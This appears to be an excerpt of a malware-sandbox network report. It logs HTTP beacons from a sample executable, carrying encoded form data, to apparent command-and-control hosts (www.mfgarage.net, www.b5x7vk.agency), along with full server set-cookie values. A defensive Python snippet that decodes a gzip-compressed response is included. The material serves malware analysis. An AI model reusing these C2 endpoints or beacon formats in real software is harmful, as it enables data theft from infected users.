                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mfgarage.net
                                              Origin: http://www.mfgarage.net
                                              Content-Length: 204
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mfgarage.net/3lu7/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: PR_xXrA=qx+IcpUA9j0ptngXegpA4dyH1gH1r6V6EJPUgqQq4lAXffQb0NETiYSRQyH14iN4JpEIxOeSouQYn5HnNiFbRIareFFsVngL2XPFVrnGYCQzXhckV2w5fF5eOX+/d96gh6AJN2MhDl3pXgOvTXpyX/FaeR7dDblcdli16jcMYrj8iWTuXByATzFYKdyxlACmBg==
                                              Sep 25, 2024 12:48:49.969575882 CEST | 1236 | IN | HTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=865; Domain=.sahibinden.com; Expires=Sat, 25-Sep-2027 10:48:49 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=HltwPNFOWpRBPPYw66f3ea91; Domain=.sahibinden.com; Expires=Sat, 25-Sep-2027 10:48:49 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=AtNgR5epvlGLyiE3BFkOnbedPRsfW-VTzUwmBuSSF5ZTf52Nzadk0NHzneFGhCyX9jaSOWc7Drz3vKzMyRB8JA; Domain=.sahibinden.com; Expires=Wed, 25-Sep-2024 11:18:49 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=bwBFavERgUZ8k8kU22d6KYTtBhKoM7WI71i3i194JxHRIIQ_kPs73rZUOiUNgGwZIDMHuZ8NPZWBx2KF20o2-Q; Domain=.sahibinden.com; Expires=Thu, 25-Sep-2025 10:48:49 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=B4kwnoMrphvuLTuCHRP-z_8p-pyjDsJ90piCZMAjOQGjk9uknEc3iATeRqDpk002IeSO5luEbzXJZHK6pDrHiHIbx_w1CyIwaNpaSc3kYU7cmKH4nphlfRoc2gvaeL2VqKyvCkZh0tfBmcafQjTLVPVx6ZceR06UPB6fNYma_9-gBs-Qfn0fam0SL1zRQ-GQ3alTTpCdum295MRErVOhNFT6osoN08De3Xyqkd0zDKUMYZk2sYFbbB9tIFVBZnV_fLG5ghqdGTb4CNB9BhQva-OvYcuj8LiqHcKJMIho5jKl1HDx1bS0VbqlFhOhcJvpuNGUvMmWI1
                                              Sep 25, 2024 12:48:49.969595909 CEST | 407 | IN | Data Ascii: ULIX0eVjujFKbY8Q1tTyOTvgl-DJz8wrAEMQJtixzvdgY2-SZ2uSy; Domain=.sahibinden.com; Expires=Wed, 25-Sep-2024 11:03:49 GMT; Path=/; Secure; SameSite=None
                                              vary: User-Agent
                                              location: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mf


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              30 | 192.168.2.4 | 49767 | 85.153.138.113 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 12:48:51.792922020 CEST | 786 | OUT | POST /3lu7/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mfgarage.net
                                              Origin: http://www.mfgarage.net
                                              Content-Length: 224
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mfgarage.net/3lu7/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: PR_xXrA=qx+IcpUA9j0puHQXbDxA59yE6AH1haV+EJTUgv864XUXf+gb1PgThYSRfSHp1CNzJpYAxL+SouEYn8jnNRtYTYalTlFiRngL2XPFVryrYCIzXwskUTM6Wl5ZG3+/Z96sh6ArN3gPDnPpXkKvTGpzd/FQQx6eKZI4aV3j8zAzVaX5uwC0GwTXBzhrXa7FoD/vav8MljkAKmWDUZ8dvM/FdMU=
                                              Sep 25, 2024 12:48:52.523732901 CEST | 1236 | IN | HTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=383; Domain=.sahibinden.com; Expires=Sat, 25-Sep-2027 10:48:52 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=0ZaNZeUw1KpSto3R66f3ea94; Domain=.sahibinden.com; Expires=Sat, 25-Sep-2027 10:48:52 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=OA_0GnEPk8o7kbqmxOQPWogk7KKnYdLrDv6Dj1rsFIh6wlzIBoAAbQtKEwpTn-Yv1v3CVAtVMvtg4R_YbTwgvg; Domain=.sahibinden.com; Expires=Wed, 25-Sep-2024 11:18:52 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=4Tq_TwfCIKOBT0Kt3xXH2KRDwTCMXWGBIwCy1A7SB15if3rDlchzM5cMtpnnJNOx5Yl7LQpfu8JoX_aEGpktkA; Domain=.sahibinden.com; Expires=Thu, 25-Sep-2025 10:48:52 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=-z_wSwLLY7z38KVTE3k1mBUxcPAXTFRH-sMfntPMWT9cJzPIPK9go99zKPpEQ63lLEtLRPUAsjCUa_6TBaQRkiS-wkZxJtl1BgR0HI8edpJTsYFlpi140KZdtJ-3D5nLbiNo66jfAdvjw4uC6gcxdrsgTh393D6q5nKtmAG5AQiVMq4OSnqSWXwgYRrCeDrGhWfXbWTjWpPiJf8cHBGJALYmpV7sMsmUPdbIRm4Wm8uOW42UmHiSGcHW8800-dX2sOLeOjnZq6cY4CFuNrbucF1KsH9DljcCxqlN06ItkykmxqvpPohVtuBBxKsBcA1kyvXE6gMdyg
                                              Sep 25, 2024 12:48:52.523838043 CEST | 407 | IN | Data Ascii: 3j6YYmqdjc2K01y2XNLd0_U3d1DacUQpDOtvZpclrUfgUJsPlXj_c; Domain=.sahibinden.com; Expires=Wed, 25-Sep-2024 11:03:52 GMT; Path=/; Secure; SameSite=None
                                              vary: User-Agent
                                              location: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mf


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              31 | 192.168.2.4 | 49768 | 85.153.138.113 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 12:48:54.346404076 CEST | 10868 | OUT | POST /3lu7/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.mfgarage.net
                                              Origin: http://www.mfgarage.net
                                              Content-Length: 10304
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.mfgarage.net/3lu7/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 25, 2024 12:48:55.213120937 CEST | 1236 | IN | HTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=537; Domain=.sahibinden.com; Expires=Sat, 25-Sep-2027 10:48:55 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=i43QxKBVDlxRyuJX66f3ea97; Domain=.sahibinden.com; Expires=Sat, 25-Sep-2027 10:48:55 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=hERC-8EAwqGT9wsa2866Um-eqxanlNF5C8YDmd5NylOb9KQAdn795bb89yWcwEK3W-h7uazf0badJy9CaVrQ8A; Domain=.sahibinden.com; Expires=Wed, 25-Sep-2024 11:18:55 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=YvIoRwZXT3VFZpdu6bLU7-z6nBHrmxOAxPfcSj9PmBbB9R6C8q8FCDcar0ApeNY07wwkV89WZf6pcOicwufhtg; Domain=.sahibinden.com; Expires=Thu, 25-Sep-2025 10:48:55 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=01TjslnEzAznE64PIMyalVxgIat7ENpmb-aCEyH3Z04XYyN9-oL8QVPOQ9DlwK6VwDIan6MJ-tpGnw9sHoFrzBgXmi4TdmH4FMMKS9vk6ifU0jj39ZhRkaBxF7qsGW4p-icpqdZkmDlnVnhMwwBpFWoi_75Adl85Xdr46Z1H9SZSuhKiMt3M2xz7st06cYDo1F10i5VPDbEB2OYEEL1bTHNEopP7FcAuiwh57KrRHYF5Hm7AdmZyzxQkw0la_ZKn9GrGmdW93WgGBDd6FUf3SaGbpiXKkdn80q-aXMRItTVuJuqHQ3BHYOoAM1ptgcB2ENA09_AmlW
                                              Sep 25, 2024 12:48:55.213213921 CEST | 407 | IN | Data Ascii: 3qGkytq4Zh82Dn3wK_wfoGns1PziuZKzQXx_C1C3_a9oRMlmAiIWv; Domain=.sahibinden.com; Expires=Wed, 25-Sep-2024 11:03:55 GMT; Path=/; Secure; SameSite=None
                                              vary: User-Agent
                                              location: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mf


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              32 | 192.168.2.4 | 49769 | 85.153.138.113 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 12:48:56.884349108 CEST | 508 | OUT | GET /3lu7/?PR_xXrA=nzWofdhWpyQTuQkDfxpOhZSR2SP28ZN4SJ26h7kwykQFM8AQx5IfrLSrYivs6QFJHI8FrKvcoPkOi5L1XFRCLbCiXi5UAF8H0knLfKrCbz8tBFYRfGccZ0A=&n0=mTk8u4lhzbnhVh HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.mfgarage.net
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 25, 2024 12:48:57.629153967 CEST | 1236 | IN | HTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=631; Domain=.sahibinden.com; Expires=Sat, 25-Sep-2027 10:48:57 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=z68uwdRFgC3zKsDm66f3ea99; Domain=.sahibinden.com; Expires=Sat, 25-Sep-2027 10:48:57 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=KEO8PlpMOyatgUbQNFP21NzVW_z10Xy1UB5grVDj0Rdi7YfzPxMWWFZmRxdQ4AbNWFkWluw49lNl5wkjPLgl_Q; Domain=.sahibinden.com; Expires=Wed, 25-Sep-2024 11:18:57 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=Xplx8EBuhjI1wU2d_6Y2lJvq-beT1ZSc1K_yET3Ro052oxCT7LLKXWmyQ-APP0bDsCv2u8LuHwFp4YixmTLPLg; Domain=.sahibinden.com; Expires=Thu, 25-Sep-2025 10:48:57 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=_MVyJrKgW5yslzSyi4bcy0_xBsCnVNmNTcm50uRVxRS5IwEhamI6issBMIstZv5QOdqoe-U1aHW7hBSUj3Vquwdq_w8Sja6vxuq7YoN48iMFeE1q9SbcVJISovsrH0D3PA6vuurt_ptZwSkjcM7wdysr2TXmvf3FdVUva1HMhnADuFpHxqmBm62q5zcxqPPKxNFG6_Wg6NCLb9Ed4AME8t-GE23q_qgSWbt88OeJpOSI7URdye1CN4YuqQ5-xy0--JmJuvKCWoLOMvkHZdppAtmNYl8V8KUm9kx7dGmA4fEXKaDXbEzbpTSt7XS4rh-yvTNcuH4MpZ
                                              Sep 25, 2024 12:48:57.629215002 CEST | 564 | IN | Data Ascii: 5TbYwqe_CE1dywbfnYfcKW_UGvSQjIwgpJbJ7G6RlU5lHnlLx6H2j; Domain=.sahibinden.com; Expires=Wed, 25-Sep-2024 11:03:57 GMT; Path=/; Secure; SameSite=None
                                              vary: User-Agent
                                              location: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mf


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              33 | 192.168.2.4 | 49770 | 104.21.11.31 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 12:49:02.783584118 CEST | 769 | OUT | POST /zznj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.b5x7vk.agency
                                              Origin: http://www.b5x7vk.agency
                                              Content-Length: 204
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.b5x7vk.agency/zznj/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: PR_xXrA=aPX6cheLmOscml4S57C+vakzzRwzTO5n6IT7i7TTvRiRBiz6yZODf8EOy174HrxqPX8f2APnr+3MOTAEKq2qU22E0lbrii4V7aCoJN8G7QqWZBlX6hSLjgV4T5XeiWObv0WdYogY6RRb0j5ak6SuMU+8S4Id2SoWDTbi/YlOLSQZ9/3LxSr/CGtiDarzKssPFQ==
                                              Sep 25, 2024 12:49:03.768829107 CEST | 748 | IN | HTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 10:49:03 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ouS10xTwD8ru2V88eyeaUNzDjjw3jcB4v0AGRb785Rx3vIc0iiXEEnHV%2FqKaKJt1ZsnwxtmHdX7wth%2FnmdEatUUiL%2Bh%2FJ7DHbeCP2TPGIf%2BFlS6sFwN5hHHXVXWCxJIGz6a9eA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c8a7202efc44370-EWR
                                              Content-Encoding: gzip


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              34 | 192.168.2.4 | 49771 | 104.21.11.31 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 12:49:05.326937914 CEST | 789 | OUT | POST /zznj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.b5x7vk.agency
                                              Origin: http://www.b5x7vk.agency
                                              Content-Length: 224
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.b5x7vk.agency/zznj/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Ascii: PR_xXrA=aPX6cheLmOsc0WQS4c2+7Kkw8xwzIe5j6Pb7i6nDvD2RBHP6xbmDMMEO5V6zZbwkPXw92FPnr+TMOTwEJZupUm28/FbtsC4V7aCoJNog7QCWYx1X7CKIggV7S5XemWOfv0W/YoRQ6Udb0jJakPutXk+6NoJCxxdPax6e5Z5uDjs185mRgjKoQGJRediHHvRGedyeXh4BPh36HZgi9O9xzVI=
                                              Sep 25, 2024 12:49:06.297909975 CEST | 746 | IN | HTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 10:49:06 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7WQdDnWPed89HzWGgTf51KdnXSFEtI3uir7Bx6AExEa38vvlI2f7jwfuMiuX1GLk3qOM%2F%2FpJV5mKz%2FBAdiMSqk39Uo9HMeDDxeIB%2Blsq38rNqa44wCocskp54eRP323TYLhToQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c8a7212b843438b-EWR
                                              Content-Encoding: gzip


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              35 | 192.168.2.4 | 49772 | 104.21.11.31 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 12:49:08.114710093 CEST | 10871 | OUT | POST /zznj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.b5x7vk.agency
                                              Origin: http://www.b5x7vk.agency
                                              Content-Length: 10304
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.b5x7vk.agency/zznj/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 61 50 58 36 63 68 65 4c 6d 4f 73 63 30 57 51 53 34 63 32 2b 37 4b 6b 77 38 78 77 7a 49 65 35 6a 36 50 62 37 69 36 6e 44 76 44 4f 52 42 31 58 36 79 36 6d 44 50 4d 45 4f 36 56 36 77 5a 62 78 34 50 58 6f 35 32 46 4c 33 72 38 37 4d 49 77 34 45 65 59 75 70 62 6d 32 38 77 6c 62 73 69 69 34 36 37 61 53 73 4a 4e 34 67 37 51 43 57 59 33 35 58 38 52 53 49 76 41 56 34 54 35 58 61 69 57 4f 6e 76 30 50 41 59 73 4d 79 35 67 68 62 7a 44 5a 61 33 4a 36 74 62 6b 2b 34 4d 6f 4a 4b 78 78 42 71 61 78 58 76 35 5a 64 49 44 6a 49 31 38 4e 37 6f 6e 41 61 53 4f 47 52 33 43 71 36 34 41 50 78 4c 51 74 47 47 59 52 51 68 61 52 2f 69 50 34 46 41 6e 37 70 4f 73 78 6c 4b 62 2b 57 71 4e 4d 4f 6c 70 65 55 4f 46 4f 77 2b 49 69 74 45 46 68 4f 6d 48 4d 6f 74 2f 67 52 69 51 6c 4a 4e 59 75 52 63 75 74 73 30 52 64 59 4a 53 5a 77 35 53 31 2b 6d 57 6c 46 58 49 7a 41 36 2f 76 2f 59 54 56 6d 43 30 54 67 5a 48 68 58 48 41 63 63 49 55 35 67 51 4c 33 6d 75 63 4f 50 6a 38 30 73 42 6f 68 4c 46 62 6c 66 61 6d 35 69 30 78 4b [TRUNCATED]
                                              Data Ascii: PR_xXrA=aPX6cheLmOsc0WQS4c2+7Kkw8xwzIe5j6Pb7i6nDvDORB1X6y6mDPMEO6V6wZbx4PXo52FL3r87MIw4EeYupbm28wlbsii467aSsJN4g7QCWY35X8RSIvAV4T5XaiWOnv0PAYsMy5ghbzDZa3J6tbk+4MoJKxxBqaxXv5ZdIDjI18N7onAaSOGR3Cq64APxLQtGGYRQhaR/iP4FAn7pOsxlKb+WqNMOlpeUOFOw+IitEFhOmHMot/gRiQlJNYuRcuts0RdYJSZw5S1+mWlFXIzA6/v/YTVmC0TgZHhXHAccIU5gQL3mucOPj80sBohLFblfam5i0xK [TRUNCATED]
                                              Sep 25, 2024 12:49:09.088731050 CEST | 744 | IN | HTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 10:49:09 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Di8wk5AqH3nA9jjmt6k2vVl9RnR7jhFGrz0ojU7e09kNJ%2BtxUYtIa5ipTpIiYztYEA19NgnQLpOw2wE8JLB58Z5zfQL%2B5vhXHa%2Bad0LpMFY4Lsv8M7LLyYsX5NV5Tl9sAr85cw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c8a72244da2b9c5-EWR
                                              Content-Encoding: gzip
                                              Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
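The 404 bodies returned to the beacons above arrive chunked and gzip-compressed, so the "Data Ascii" rendering is unreadable; decoding the captured bytes shows what the C2 host actually served. The Python below is an added example written for this page, not part of the Joe Sandbox report or of the sample: it takes the "Data Raw" bytes of the session 35 response exactly as printed above, strips the chunk framing, inflates the gzip stream under an output cap (the ISIZE trailer field is written by the server and is only a hint, so it must not be used as the bound), and returns the HTML.

```python
import zlib

# "Data Raw" of the 404 response in session 35, copied byte-for-byte from the
# report above: chunk size "a7\r\n", 0xa7 bytes of gzip, then "\r\n0\r\n\r\n".
RAW_BODY = bytes.fromhex(
    "61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85"
    " de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd"
    " bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8"
    " b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58"
    " 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59"
    " 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e"
    " 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24"
    " 02 00 00 0d 0a 30 0d 0a 0d 0a"
)


def dechunk(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body into the entity bytes."""
    out, pos = bytearray(), 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";", 1)[0], 16)   # drop chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)          # terminal chunk; trailers are ignored
        out += body[pos:pos + size]
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("bad chunk terminator at offset %d" % pos)
        pos += 2


def gzip_trailer(data: bytes) -> tuple:
    """(CRC32, ISIZE) from the last 8 bytes. ISIZE is the length mod 2**32 as
    written by the sender, so it is reported but never trusted as a bound."""
    return int.from_bytes(data[-8:-4], "little"), int.from_bytes(data[-4:], "little")


def gunzip_bounded(data: bytes, limit: int = 1 << 20) -> bytes:
    """Inflate a gzip stream, refusing to emit more than `limit` bytes."""
    if data[:2] != b"\x1f\x8b":
        raise ValueError("not a gzip stream")
    inflater = zlib.decompressobj(wbits=31)       # 31 = gzip framing, 32 KiB window
    out = inflater.decompress(data, limit)
    if inflater.unconsumed_tail:
        raise ValueError("output exceeds %d bytes; refusing to continue" % limit)
    if not inflater.eof:
        raise ValueError("truncated gzip stream")  # CRC32/ISIZE are verified by zlib at eof
    return out


def decode_response_body(raw: bytes = RAW_BODY, limit: int = 1 << 20) -> bytes:
    """Chunked + gzip response body -> plain entity bytes."""
    return gunzip_bounded(dechunk(raw), limit)


if __name__ == "__main__":
    entity = dechunk(RAW_BODY)
    print("gzip trailer crc32=%08x isize=%d" % gzip_trailer(entity))
    html = decode_response_body()
    print(len(html), "bytes:")
    print(html.decode("ascii", "replace"))
```

The ISIZE in the trailer of these bytes is 0x224 = 548, the same size as the uncompressed nginx 404 page the server sends in session 36 below, which is the expected outcome: the C2 answers the beacon with a generic 404 and reveals nothing in the body.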


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                              36 | 192.168.2.4 | 49773 | 104.21.11.31 | 80
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 25, 2024 12:49:10.933710098 CEST | 509 | OUT | GET /zznj/?n0=mTk8u4lhzbnhVh&PR_xXrA=XN/afWzprYUm2zEh/Me8v7IO6BZfJ8ldqsTKqfvYzDGyGH3Qqe2ibLEK4zu3d4hkDWgHsBH7o/PgLSUsZsuwL2SV1lDf+BUf6ZfDIcx/0TWTXhhDzyKZrRs= HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.b5x7vk.agency
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 25, 2024 12:49:11.930526018 CEST | 1098 | IN | HTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 10:49:11 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b02zpv%2BTZ0k02sDOFHzZyUuvMqFcsCQ9EePCYzr5Vhd53SM5QjSsLymWlfvnX7C8qeaGAQhvzwffFkaham4A45glhKEdHLAUitxRVxuStlepiJqHDWEB7P5REusFuPVgAtGQsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c8a7235eb98c461-EWR
